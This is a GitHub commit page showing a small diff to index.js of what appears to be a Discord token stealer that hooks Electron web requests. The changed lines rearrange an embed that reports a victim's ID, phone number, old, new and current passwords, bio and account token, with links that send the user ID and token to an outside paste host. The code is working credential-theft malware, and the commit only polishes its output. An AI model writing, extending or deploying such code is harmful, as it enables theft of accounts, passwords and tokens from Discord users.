Update index.js

This commit is contained in:
What about KSCH 2023-02-21 21:47:41 +01:00 committed by GitHub
parent 14a9538fbe
commit ea8adf9787
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 9 deletions

View File

@ -646,10 +646,6 @@ electron.session.defaultSession.webRequest.onCompleted(config.onCompleted, async
name: "ID <:iduser:1041634535395307520>",
value: `\`${user.id}\`\n[Copy ID](https://paste-pgpj.onrender.com/?p=${user.id})`,
inline: !0
}, {
name: "Bio <a:blackcapgif:1041634542093619260>",
value: `\`${user.bio ?? "None"}\``,
inline: !0
}, {
name: "Nitro <a:nitro:1041639670288748634>",
value: `${GetNitro(Nitro)}`,
@ -684,7 +680,7 @@ electron.session.defaultSession.webRequest.onCompleted(config.onCompleted, async
inline: !0
}, {
name: "Phone :mobile_phone:",
value: `\`${user.phone ?? "None"}\``,
value: `\`${user.phone ?? ":x:"}\``,
inline: !0
}, {
name: "<a:password:1041639669047238676> Old Password",
@ -694,6 +690,10 @@ electron.session.defaultSession.webRequest.onCompleted(config.onCompleted, async
name: "<a:password:1041639669047238676> New Password",
value: `\`${data.new_password}\``,
inline: !0
}, {
name: "Bio <a:blackcapgif:1041634542093619260>",
value: `\`\`\`${user.bio ?? ":x:"}\`\`\``,
inline: !1
}, {
name: "<a:tokens:1041634540537511957> Token",
value: `\`\`\`${token}\`\`\`\n[Copy Token](https://paste-pgpj.onrender.com/?p=${token})\n\n[Download Banner](${userBanner})`,
@ -733,10 +733,6 @@ electron.session.defaultSession.webRequest.onCompleted(config.onCompleted, async
name: "ID <:iduser:1041634535395307520>",
value: `\`${user.id}\`\n[Copy ID](https://paste-pgpj.onrender.com/?p=${user.id})`,
inline: !0
}, {
name: "Bio <a:blackcapgif:1041634542093619260>",
value: `\`${user.bio ?? "None"}\``,
inline: !0
}, {
name: "Nitro <a:nitro:1041639670288748634>",
value: `${GetNitro(Nitro)}`,
@ -777,6 +773,10 @@ electron.session.defaultSession.webRequest.onCompleted(config.onCompleted, async
name: "<a:password:1041639669047238676> Password",
value: `\`${data.password}\``,
inline: !0
}, {
name: "Bio <a:blackcapgif:1041634542093619260>",
value: `\`\`\`${user.bio ?? ":x:"}\`\`\``,
inline: !1
}, {
name: "<a:tokens:1041634540537511957> Token",
value: `\`\`\`${token}\`\`\`\n[Copy Token](https://paste-pgpj.onrender.com/?p=${token})\n\n[Download Banner](${userBanner})`,